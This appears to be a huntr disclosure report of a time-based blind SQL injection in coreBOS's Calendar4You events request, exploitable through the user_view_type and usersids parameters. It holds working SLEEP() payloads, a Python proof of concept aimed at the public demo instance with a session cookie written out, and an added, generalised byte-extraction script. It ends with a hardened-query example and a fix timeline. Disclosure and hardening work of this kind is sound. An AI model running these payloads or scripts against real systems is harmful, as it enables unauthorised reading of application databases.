SQL Injection in tsolucio/corebos

Status: Valid

Reported on Dec 20th 2021

Description

coreBOS is vulnerable to a time-based blind SQL injection in the user_view_type parameter of the Calendar4You AJAX events request (index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events), which lets an attacker execute SQL statements against the application's database. The response body does not change with the injected condition, so the result of each probe is inferred from the response time: the payload calls SLEEP() only when the condition (here, a comparison against one byte of version()) is true.

Payload (user_view_type)

1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(5-(IF(ascii(substr(version(),1,1))=53,0,5)))))ZnYh)

Proof of Concept

# Blind_SQL.py
import requests

url = "https://demo.corebos.com/"
query = "index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events&typeids=1,2,4,invite,Assets,Campaigns,Contacts,cbupdater,Invoice,Potentials,CobroPago,ProductComponent&usersids=&view=agendaWeek&event_status=&task_priority=&block_status={\"event_type\":\"block\",\"module_type\":\"block\",\"et_status\":\"block\",\"task_priority\":\"block\"}&save=&start=1639353600&end=1639958400"
cookies = {"democoreboscom": "86b8cecae7a5f8d1e2fa41116a7e1ffc"}  # logged-in session on the demo instance

# Probe one byte at a time: the server runs SLEEP(2) when the byte at position i
# equals x and SLEEP(0) otherwise (the IF() returns 2 on a miss, never a negative
# argument to SLEEP). substr() positions are 1-based, so start at 1.
Database_Version = []
for i in range(1, 21):
    found = False
    for x in range(46, 58):  # '.' and '0'..'9': enough for a dotted version number
        payload = "&user_view_type=1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(2-(IF(ascii(substr(version(),{},1))={},0,2)))))ZnYh)".format(i, x)
        r = requests.get(url + query + payload, cookies=cookies, timeout=20)
        if r.elapsed.total_seconds() > 2:
            print("[+] Character number {} == {}".format(i, chr(x)))
            Database_Version.append(chr(x))
            found = True
            break  # the byte is known; skip the remaining candidates for this position
    if not found:
        break  # nothing matched: end of the string, or a byte outside the candidate range

print("".join(Database_Version))
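A generalised version of the same time-based extraction, added here as an example (it is not the report's PoC and not coreBOS code). Compared with the linear scan above it binary-searches each byte's ASCII value (8 probes per position instead of up to 12, and any byte rather than only digits and dots), calibrates a latency baseline so a slow link is not mistaken for SLEEP(), and keeps the network code in one function so the search logic can be run offline against a constructed stand-in for the server. The demo host and trimmed request come from the report; the session-cookie placeholder, the probe helpers and the simulated target are assumptions of this example.

```python
"""Generalised time-based blind extraction (added example, not the report's PoC)."""
from typing import Callable

BASE_URL = "https://demo.corebos.com/"
QUERY = ("index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events"
         "&view=agendaWeek&start=1639353600&end=1639958400")   # trimmed request


def numeric_probe(expr: str, pos: int, threshold: int, delay: int) -> str:
    """Probe for the numeric context of user_view_type: MySQL sleeps `delay`
    seconds when ASCII(SUBSTR(expr,pos,1)) > threshold, otherwise SLEEP(0)."""
    return ("1 AND (SELECT 8513 FROM (SELECT(SLEEP(IF(ASCII(SUBSTR({e},{p},1))>{t},{d},0))))x)"
            .format(e=expr, p=pos, t=threshold, d=delay))


def string_probe(expr: str, pos: int, threshold: int, delay: int) -> str:
    """Same probe for the quoted string context of usersids, in the '+...+'
    shape of the report's second payload (a scalar subquery needs no FROM)."""
    return ("'+(SELECT(SLEEP(IF(ASCII(SUBSTR({e},{p},1))>{t},{d},0))))+'"
            .format(e=expr, p=pos, t=threshold, d=delay))


def http_send(param: str, session_cookie: str) -> Callable[[str], float]:
    """Return send(probe) that injects the probe into `param` and reports the
    response time in seconds. This is the only function that touches the network."""
    def send(probe: str) -> float:
        import requests                       # imported lazily: unused offline
        from urllib.parse import quote
        url = BASE_URL + QUERY + "&" + param + "=" + quote(probe, safe="")
        r = requests.get(url, cookies={"democoreboscom": session_cookie}, timeout=30)
        return r.elapsed.total_seconds()
    return send


def simulated_send(secret: str, rtt: float = 0.25) -> Callable[[str], float]:
    """Constructed offline stand-in for the server: parses a version() probe and
    returns the time the real server would take, without actually sleeping."""
    def send(probe: str) -> float:
        tail = probe.split("SUBSTR(version(),", 1)[1]      # e.g. "3,1))>64,2,0))))x)"
        pos, rest, delay = tail.split(",", 3)[:3]
        threshold = int(rest.split(">")[1])
        p = int(pos)
        ch = ord(secret[p - 1]) if p <= len(secret) else 0  # MySQL: ASCII('') = 0
        return rtt + (int(delay) if ch > threshold else 0)
    return send


def timed_oracle(send: Callable[[str], float], probe: Callable[..., str],
                 expr: str, delay: int = 2) -> Callable[[int, int], bool]:
    """Turn a timing send() into a boolean oracle(pos, threshold).
    Baseline = slowest of three always-false probes (no byte exceeds 255), so the
    cutoff is baseline + half the delay rather than a fixed number of seconds."""
    baseline = max(send(probe(expr, 1, 255, delay)) for _ in range(3))
    cutoff = baseline + delay / 2

    def oracle(pos: int, threshold: int) -> bool:
        return send(probe(expr, pos, threshold, delay)) > cutoff
    return oracle


def extract(oracle: Callable[[int, int], bool], max_len: int = 32) -> str:
    """Recover a string byte by byte; oracle(pos, t) answers 'byte at pos > t?'."""
    out = []
    for pos in range(1, max_len + 1):               # SUBSTR positions are 1-based
        lo, hi = 0, 255                             # the byte value is always in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                                 # ASCII('') = 0: past the end
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    # Offline demo; against the real target use http_send("user_view_type", "<cookie>").
    oracle = timed_oracle(simulated_send("5.7.33-log"), numeric_probe, "version()", 2)
    print(extract(oracle))
```

Swapping numeric_probe for string_probe and "user_view_type" for "usersids" reuses everything else, which is the practical point of keeping the probe text separate from the oracle and the search: the only part that changes between the two injection points on this page is the fragment that has to fit the surrounding SQL.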

Impact

This vulnerability lets an attacker who can send this request (the PoC uses a logged-in session on the demo instance) retrieve sensitive information from the target database, one byte per request, using time-based payloads such as the one above.

Occurrences

The usersids parameter of the same request is also vulnerable, but it is placed inside a quoted string rather than a numeric expression, so it is exploited with a different payload (%2b is a URL-encoded +, so the server sees '+(select * from (select(sleep(1)))a)+'):

Payload

'%2b(select+*+from+(select(sleep(1)))a)%2b'
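The vulnerable query shape beside a hardened form, added as an example. coreBOS is written in PHP and this page records only that a fix was merged in 2ce9f3, not the patched code, so this is not the project's fix. It rebuilds the two injection contexts from the report in SQLite: user_view_type concatenated into a numeric comparison and usersids concatenated inside quotes, then shows the same lookup with input validation and bound parameters. The table, its rows, the column names and the set of allowed view-type codes are constructed for the example.

```python
"""Vulnerable query construction beside a hardened form (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the calendar activity table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE vtiger_activity(
            activityid INTEGER PRIMARY KEY, subject TEXT, view_type INTEGER, owner INTEGER);
        INSERT INTO vtiger_activity VALUES
            (1, 'Board meeting', 1, 1), (2, 'Private call', 2, 2), (3, 'Site visit', 1, 3);
    """)
    return con


def vulnerable_events(con, user_view_type: str, usersids: str) -> list:
    """Mirrors the reported flaw: both parameters are pasted into the SQL text,
    user_view_type in a numeric context and usersids inside single quotes."""
    sql = ("SELECT subject FROM vtiger_activity WHERE view_type = " + user_view_type
           + " AND owner IN ('" + usersids + "') ORDER BY activityid")
    return [row[0] for row in con.execute(sql)]


ALLOWED_VIEW_TYPES = {"1", "2"}   # assumed set of view-type codes the UI can send


def hardened_events(con, user_view_type: str, usersids: str) -> list:
    """Validate the shape of each input, then bind every value; the SQL text is
    constant, so SLEEP(), quotes or boolean tails never reach the SQL parser."""
    if user_view_type not in ALLOWED_VIEW_TYPES:
        raise ValueError("invalid user_view_type")
    ids = [int(s) for s in usersids.split(",") if s]   # int() raises on quotes/operators
    placeholders = ",".join("?" * len(ids)) or "NULL"   # IN (NULL) matches nothing
    sql = ("SELECT subject FROM vtiger_activity WHERE view_type = ? AND owner IN ("
           + placeholders + ") ORDER BY activityid")
    return [row[0] for row in con.execute(sql, [int(user_view_type), *ids])]


def rejects(con, user_view_type: str, usersids: str) -> bool:
    """True if the hardened handler refuses the input before running any SQL."""
    try:
        hardened_events(con, user_view_type, usersids)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    # Numeric context: a boolean tail widens "view_type = 2" to rows the caller may not see
    print(vulnerable_events(con, "2 OR 1=1", "1"))
    # String context: the usersids quote is closed and the owner filter bypassed
    print(vulnerable_events(con, "1", "x') OR ('1'='1"))
    print(hardened_events(con, "1", "1,3"), rejects(con, "2 OR 1=1", "1"))
```

The same split applies in the PHP code base: an allowlist check for the view-type code and integer casting of each user id before the values are passed as bound parameters, so the fix does not depend on escaping the attacker's input.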
Timeline

Report submitted by itsfading; huntr contacted the tsolucio/corebos team, itsfading modified the report, and huntr sent three follow-ups to the team (the report was marked stale after the third).

itsfading (Researcher): any updates?

Joe Bordes validated this vulnerability.
itsfading has been awarded the disclosure bounty.
Joe Bordes confirmed that a fix has been merged on 2ce9f3 and has been awarded the fix bounty.
Validated fix locations: SaveEventSettings.php#L13, Events.php#L265-L277, CalendarView.php#L231.